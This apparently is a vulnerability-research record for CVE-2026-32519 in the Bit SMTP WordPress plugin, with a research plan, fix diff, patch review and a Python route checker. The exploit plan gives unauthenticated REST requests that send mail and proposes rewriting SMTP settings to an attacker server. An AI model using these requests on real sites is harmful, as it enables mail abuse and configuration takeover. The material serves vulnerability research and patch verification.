[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f9shH5GjfdaR3_elAHWVkZA5at7d4RH_oxWGqILvwmz0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-32519","bit-smtp-easy-smtp-solution-with-email-logs-missing-authorization","Bit SMTP – Easy SMTP Solution with Email Logs \u003C= 1.2.2 - Missing Authorization","The Bit SMTP – Easy SMTP Solution with Email Logs plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.2.2. 
This makes it possible for unauthenticated attackers to perform an unauthorized action.","bit-smtp",null,"\u003C=1.2.2","1.2.3","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-20 00:00:00","2026-03-27 18:13:03",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9da38075-2268-4f98-b02c-0c7c34e16d85?source=api-prod",8,[22,23,24,25],"assets\u002F@emotion\u002Freact-528d86a2.js","assets\u002F@tanstack\u002Freact-query-ca364c09.js","assets\u002Fantd-52e27ed6.js","assets\u002Fbf-104-2.svg","researched",false,3,"# Research Plan: CVE-2026-32519 - Bit SMTP Missing Authorization\n\n## 1. Vulnerability Summary\nThe **Bit SMTP** plugin for WordPress (versions \u003C= 1.2.2) is vulnerable to **Missing Authorization**. This occurs because the plugin registers REST API endpoints (or AJAX handlers) meant for administrative tasks (like sending test emails or updating SMTP configurations) but fails to implement a `permission_callback` that verifies the user has the `manage_options` capability. Consequently, an unauthenticated attacker can trigger these functions remotely.\n\nGiven the plugin's architecture (using React, Ant Design, and TanStack Query as seen in the provided assets), the backend logic is primarily handled via the **WordPress REST API**.\n\n## 2. Attack Vector Analysis\n*   **Endpoint**: REST API route (Inferred: `\u002Fwp-json\u002Fbit-smtp\u002Fv1\u002Ftest-email` or `\u002Fwp-json\u002Fbit-smtp\u002Fv1\u002Fsend-test-email`).\n*   **Method**: `POST`\n*   **Authentication**: None (Unauthenticated).\n*   **Preconditions**: The plugin must be active. If the endpoint requires a REST nonce, it must be obtainable from the frontend.\n*   **Payload**: JSON object containing SMTP test parameters or target email addresses.\n\n## 3. Code Flow (Inferred)\n1.  **Registration**: The plugin uses the `rest_api_init` hook to register routes.\n2.  
**Vulnerable Route**: A route (e.g., `bit-smtp\u002Fv1\u002Ftest-email`) is registered.\n3.  **Missing Check**: The `register_rest_route` call either:\n    *   Omits the `permission_callback` argument entirely (since WordPress 5.5 this triggers a `_doing_it_wrong` notice, but the route still answers every caller).\n    *   Sets `permission_callback` to `__return_true`.\n    *   Only checks for a valid nonce but does not verify user capabilities (`current_user_can('manage_options')`).\n4.  **Execution**: The callback function (likely in a `ConfigController` or `SmtpController`) executes administrative logic (sending an email) for any requester.\n\n## 4. Nonce Acquisition Strategy\nWhile the vulnerability is \"Missing Authorization,\" a nonce check may still be in the way, so it pays to be precise about what the core REST nonce does. WordPress uses the `wp_rest` nonce (sent as the `X-WP-Nonce` header or the `_wpnonce` parameter) only to decide whether a cookie session counts as logged in; a request without it is treated as anonymous and still reaches any route whose `permission_callback` admits the public. A nonce therefore blocks an unauthenticated attacker only if the plugin verifies one itself.\n\n1.  **Identify Localization**: Bit Apps plugins typically localize variables into a global JS object. Based on common patterns for this developer, look for `bitSmtpVars` or `bitsmtp_vars`.\n2.  **Create Trigger Page**: The plugin's scripts (and nonces) are usually loaded on the plugin's admin page. However, we need a way to get it unauthenticated. Check if the plugin enqueues scripts on the frontend (e.g., via a shortcode). \n    *   Check for shortcodes (single quotes, so the shell does not expand `$GLOBALS` to nothing): `wp eval 'print_r( array_keys( $GLOBALS[\"shortcode_tags\"] ) );'`\n    *   If a shortcode like `[bit-smtp]` or `[bit_smtp]` exists, create a page:\n        `wp post create --post_type=page --post_status=publish --post_content='[bit-smtp]'`\n3.  **Extract Nonce**:\n    *   Navigate to the created page or the homepage.\n    *   Use `browser_eval` to find the nonce:\n        ```javascript\n        window.bitSmtpVars?.nonce || window.bitsmtp_ajax?.nonce\n        ```\n4.  **Alternative (Common for Bit Apps)**: If the plugin is purely for admin use, the nonce might not be on the frontend. In that case, check if the endpoint is accessible *without* a nonce (some `GET` routes or improperly configured `POST` routes allow this).\n\n## 5. 
Exploitation Strategy\nThe goal is to trigger the unauthorized sending of a test email, demonstrating the ability to use the server's mail-sending capabilities.\n\n**Step 1: Discover the Exact Route**\nRun the following to list the `bit-smtp` routes, their methods and their permission callbacks. Use `rest_get_server()` rather than `$GLOBALS[\"wp_rest_server\"]`: in a `wp eval` context the global is not populated until the server is built, and `rest_get_server()` also fires `rest_api_init`, which is what registers the plugin's routes:\n```bash\nwp eval 'foreach( rest_get_server()->get_routes(\"bit-smtp\u002Fv1\") as $path => $handlers ) { foreach( $handlers as $h ) { echo \"Path: $path [\" . implode(\",\", array_keys($h[\"methods\"])) . \"]\\n\"; var_dump($h[\"permission_callback\"]); } }'\n```\n\n**Step 2: Prepare the Payload**\nAssuming the route is `\u002Fwp-json\u002Fbit-smtp\u002Fv1\u002Fsend-test-email`, the payload usually requires:\n*   `to`: An email address under your control.\n*   `subject`: \"CVE-2026-32519 PoC\"\n*   `message`: \"Exploit Successful\"\n\n**Step 3: Send the Request**\nUsing the `http_request` tool. When testing the unauthenticated path, drop the `X-WP-Nonce` header entirely: an invalid or stale nonce value is rejected by core with `rest_cookie_invalid_nonce` (403) before any route runs, even for anonymous callers, whereas no nonce at all simply makes the request anonymous.\n```json\n{\n  \"method\": \"POST\",\n  \"url\": \"http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fbit-smtp\u002Fv1\u002Fsend-test-email\",\n  \"headers\": {\n    \"Content-Type\": \"application\u002Fjson\",\n    \"X-WP-Nonce\": \"EXTRACTED_NONCE_OR_OMIT\"\n  },\n  \"data\": {\n    \"to\": \"attacker@example.com\",\n    \"subject\": \"Unauthorized Test Email\",\n    \"message\": \"This email was sent via an unauthenticated REST API call.\"\n  }\n}\n```\n\n## 6. Test Data Setup\n1.  **Install Plugin**: `wp plugin install bit-smtp --version=1.2.2 --activate`\n2.  **Configure SMTP (Optional)**: If the plugin requires configuration before sending, use WP-CLI to set dummy options:\n    `wp option update bit_smtp_options '{\"host\":\"localhost\",\"port\":\"25\",\"user\":\"\",\"pass\":\"\",\"type\":\"smtp\"}'` (Note: exact option name may vary; check `wp option list | grep smtp`).\n3.  **Public Page**: Create a page to check for leaked nonces if necessary.\n\n## 7. 
Expected Results\n*   **HTTP Response**: `200 OK` or `201 Created`.\n*   **Body**: A JSON response indicating success, e.g., `{\"success\": true, \"data\": \"Email sent successfully\"}`.\n*   **Action**: The WordPress instance attempts to send an email (can be verified via logs).\n\n## 8. Verification Steps\n1.  **Check Mail Logs**: If a mail logging plugin is installed (or the Bit SMTP internal logs are used), check for the unauthorized email. Keep the PHP in single quotes so the shell does not expand `$wpdb`; the table name is a guess, so list candidates first with `wp db tables --all-tables | grep -i smtp`:\n    `wp eval 'global $wpdb; print_r( $wpdb->get_results( \"SELECT * FROM {$wpdb->prefix}bit_smtp_logs ORDER BY id DESC LIMIT 1\" ) );'`\n2.  **Verify Capability Failure**: Try the same request on a patched version (1.2.3) and confirm it is refused: a `401 Unauthorized` or `403 Forbidden`, or an error body carrying the middleware's `unauthorized access` message, and no new log row.\n\n## 9. Alternative Approaches\nIf the `send-test-email` endpoint is not vulnerable, try:\n*   **Log Access**: `\u002Fwp-json\u002Fbit-smtp\u002Fv1\u002Fget-logs` (Information Disclosure).\n*   **Settings Update**: `\u002Fwp-json\u002Fbit-smtp\u002Fv1\u002Fupdate-config` (Integrity breach). \n    *   Payload: Change the `from_email` or SMTP credentials to an attacker-controlled server.\n*   **Check AJAX**: If REST routes are properly protected, search for `wp_ajax_nopriv_bit_smtp` actions in the source code using `grep -r \"wp_ajax_nopriv\"`.","The Bit SMTP plugin for WordPress is vulnerable to unauthorized access because it fails to apply authorization middleware to its REST API routes in versions up to 1.2.2. This allows unauthenticated attackers to perform administrative actions such as sending test emails, modifying SMTP configurations, and viewing email logs.","\u002F* backend\u002Fapp\u002FProviders\u002FHookProvider.php *\u002F\n\nif (isset($this->_pluginBackend)\n    && RequestType::is(RequestType::API)\n) {\n    $router = new Router(RequestType::API, Config::SLUG, 'v' . Config::API_VERSION);\n\n    include $this->_pluginBackend . 'hooks' . DIRECTORY_SEPARATOR . 
'api.php';\n    $router->register();\n}\n\n---\n\n\u002F* backend\u002Fhooks\u002Fapi.php *\u002F\n\nRoute::group(function () {\n    Route::post('mail\u002Fconfig\u002Fsave', [SMTPController::class, 'saveMailConfig']);\n    Route::get('mail\u002Fconfig\u002Fget', [SMTPController::class, 'index']);\n    Route::post('mail\u002Ftest\u002Femail', [SMTPController::class, 'sendTestEmail']);\n    Route::get('mail\u002Flogs', [LogController::class, 'index']);\n    Route::post('mail\u002Flogs\u002Fdelete', [LogController::class, 'destroy']);\n    Route::post('telemetry\u002Fsave', [TelemetryPopupController::class, 'saveTelemetry']);\n});","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbit-smtp\u002F1.2.2\u002Fbackend\u002Fapp\u002FHTTP\u002FMiddleware\u002FNonceCheckerMiddleware.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbit-smtp\u002F1.2.3\u002Fbackend\u002Fapp\u002FHTTP\u002FMiddleware\u002FNonceCheckerMiddleware.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbit-smtp\u002F1.2.2\u002Fbackend\u002Fapp\u002FHTTP\u002FMiddleware\u002FNonceCheckerMiddleware.php\t2025-11-08 13:27:56.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbit-smtp\u002F1.2.3\u002Fbackend\u002Fapp\u002FHTTP\u002FMiddleware\u002FNonceCheckerMiddleware.php\t2026-02-20 10:00:30.000000000 +0000\n@@ -11,10 +10,6 @@\n {\n     public function handle(Request $request, ...$params)\n     {\n-        if (!$request->has('_ajax_nonce') || !wp_verify_nonce(sanitize_key($request->_ajax_nonce), Config::VAR_PREFIX . 
'nonce')) {\n-            return Response::error('Invalid token')->httpStatus(411);\n-        }\n-\n         if (!Capabilities::check('manage_options')) {\n             return Response::error([])->message('unauthorized access');\n         }\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbit-smtp\u002F1.2.2\u002Fbackend\u002Fapp\u002FProviders\u002FHookProvider.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbit-smtp\u002F1.2.3\u002Fbackend\u002Fapp\u002FProviders\u002FHookProvider.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbit-smtp\u002F1.2.2\u002Fbackend\u002Fapp\u002FProviders\u002FHookProvider.php\t2025-11-08 13:27:56.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbit-smtp\u002F1.2.3\u002Fbackend\u002Fapp\u002FProviders\u002FHookProvider.php\t2026-02-20 10:00:30.000000000 +0000\n@@ -32,6 +32,7 @@\n             && RequestType::is(RequestType::API)\n         ) {\n             $router = new Router(RequestType::API, Config::SLUG, 'v' . Config::API_VERSION);\n+            $router->setMiddlewares(Plugin::instance()->middlewares());\n \n             include $this->_pluginBackend . 'hooks' . DIRECTORY_SEPARATOR . 'api.php';\n             $router->register();","An unauthenticated attacker can exploit this vulnerability by directly making requests to the plugin's REST API endpoints. \n\n1. Identify the site's REST API base URL (typically `\u002Fwp-json\u002Fbit-smtp\u002Fv1\u002F`).\n2. To send an unauthorized email, send a POST request to `\u002Fwp-json\u002Fbit-smtp\u002Fv1\u002Fmail\u002Ftest\u002Femail` with a JSON payload containing the target 'to' address, 'subject', and 'message'.\n3. 
Because the vulnerable versions (\u003C= 1.2.2) fail to attach the `NonceCheckerMiddleware` to the API router, the request will process without verifying a nonce or checking if the user has `manage_options` capabilities, resulting in the plugin executing the administrative action.","gemini-3-flash-preview","2026-04-18 02:01:16","2026-04-18 02:02:27",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","1.2.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbit-smtp\u002Ftags\u002F1.2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbit-smtp.1.2.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbit-smtp\u002Ftags\u002F1.2.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbit-smtp.1.2.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbit-smtp\u002Ftags"]
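Review bot: In the NonceCheckerMiddleware hunk of the fix diff above, the surviving denial `return Response::error([])->message('unauthorized access');` sets no HTTP status, while the deleted nonce branch did (`->httpStatus(411)`, itself the wrong code, 411 meaning Length Required); an anonymous caller that fails `Capabilities::check('manage_options')` should receive a 401 or 403 (suggest `->httpStatus(403)`) so that clients, and the `401 Unauthorized` or `403 Forbidden` check in the verification steps, can tell denial from success without parsing the body. Dropping the `_ajax_nonce` check is acceptable only because these are REST routes, where core's cookie authentication refuses to attach a logged-in user unless a valid `wp_rest` nonce is sent, so the remaining capability check cannot be satisfied by a cross-site request riding a cookie session; that reasoning deserves a comment beside the remaining check. The hunk header `@@ -11,10 +10,6 @@` also records one more deleted line above this context that is not shown on this page, so the full patch should be read before sign-off.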
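Review bot: In the HookProvider hunk of the fix diff above, the fix rests on the single added line `$router->setMiddlewares(Plugin::instance()->middlewares());`, but neither `Plugin::middlewares()` nor the binding of `NonceCheckerMiddleware` to individual routes appears in the diff, and the `Route::group(function () { ... })` in `backend/hooks/api.php` (reproduced in the vulnerable code above) declares no middleware of its own; confirm that setting the list on the router applies the middleware to every route in that group rather than merely registering it by name, and add a regression test that calls `mail/config/get` and `mail/test/email` with no session and expects a denial. A one-line call the caller must remember is easy to lose in a later refactor of the provider; attaching the middleware list inside the `Router` constructor for `RequestType::API` would make the omission that caused CVE-2026-32519 impossible to repeat.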
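The exploit outline and the verification steps above describe probing the routes anonymously by hand. The following is an added example, not code from the plugin, the advisory or the research notes, that automates that check: it requests each route from `backend/hooks/api.php` with no cookies and no nonce and classifies the answer. The transport is injectable so the logic runs offline against constructed responses. Assumptions not established by the page: the routes live under `/wp-json/bit-smtp/v1/`, a patched site answers the capability failure with a body containing the `unauthorized access` text from `NonceCheckerMiddleware`, and a vulnerable site answers an anonymous call with JSON.

```python
"""Anonymous reachability check for the Bit SMTP REST routes (added example)."""
import json
from typing import Callable, Dict, Optional, Tuple

# Assumed rendering of Config::SLUG and 'v' . Config::API_VERSION.
NAMESPACE = "bit-smtp/v1"

# Routes copied from backend/hooks/api.php, keyed by HTTP method.
ROUTES = {
    "GET": ["mail/config/get", "mail/logs"],
    "POST": ["mail/config/save", "mail/test/email", "mail/logs/delete", "telemetry/save"],
}

# (method, url, body) -> (status, body_text). Swappable for a fake in tests.
Transport = Callable[[str, str, Optional[bytes]], Tuple[int, str]]


def urllib_transport(method: str, url: str, body: Optional[bytes]) -> Tuple[int, str]:
    """Real transport: no cookies and no X-WP-Nonce, so the caller is anonymous."""
    from urllib import error, request
    req = request.Request(url, data=body, method=method,
                          headers={"Content-Type": "application/json"})
    try:
        with request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except error.HTTPError as exc:
        return exc.code, exc.read().decode("utf-8", "replace")


def classify(status: int, body: str) -> str:
    """Map one anonymous response to a verdict.

    absent      route not registered (plugin inactive or namespace differs)
    patched     a denial reached the caller: REST 401/403, or the middleware's
                'unauthorized access' error (assumed text; its status is not
                fixed by the patch, so the body is checked as well)
    vulnerable  the controller ran and answered an anonymous caller with JSON
    unknown     anything else (WAF page, HTML error, redirect to login)
    """
    if status == 404:
        return "absent"
    if status in (401, 403) or "unauthorized access" in body.lower():
        return "patched"
    if status // 100 == 2:
        try:
            json.loads(body)
            return "vulnerable"
        except ValueError:
            pass
    return "unknown"


def check_site(base_url: str, transport: Transport = urllib_transport,
               probe_post: bool = False) -> Dict[str, str]:
    """Probe the read-only GET routes; POST routes only when explicitly enabled.

    mail/test/email sends mail and mail/config/save rewrites the SMTP settings,
    so POST probes are off by default and, when enabled, send an empty object.
    """
    verdicts: Dict[str, str] = {}
    for method in (["GET", "POST"] if probe_post else ["GET"]):
        for route in ROUTES[method]:
            url = f"{base_url.rstrip('/')}/wp-json/{NAMESPACE}/{route}"
            payload = b"{}" if method == "POST" else None
            status, body = transport(method, url, payload)
            verdicts[f"{method} {route}"] = classify(status, body)
    return verdicts


# Constructed responses standing in for a 1.2.2 site and a 1.2.3 site.
def fake_vulnerable_transport(method, url, body):
    return 200, json.dumps({"success": True, "data": {"host": "smtp.example.test", "port": 587}})


def fake_patched_transport(method, url, body):
    return 200, json.dumps({"success": False, "message": "unauthorized access"})


if __name__ == "__main__":
    print(check_site("https://site.example.test", transport=fake_vulnerable_transport))
    print(check_site("https://site.example.test", transport=fake_patched_transport, probe_post=True))
```

Against a live site pass `transport=urllib_transport` (the default) and leave `probe_post` off unless you own the target: a 1.2.2 site will act on the POST routes, and an empty body may still produce a validation error from the controller, which this classifier reports as `unknown` even though the handler was reached.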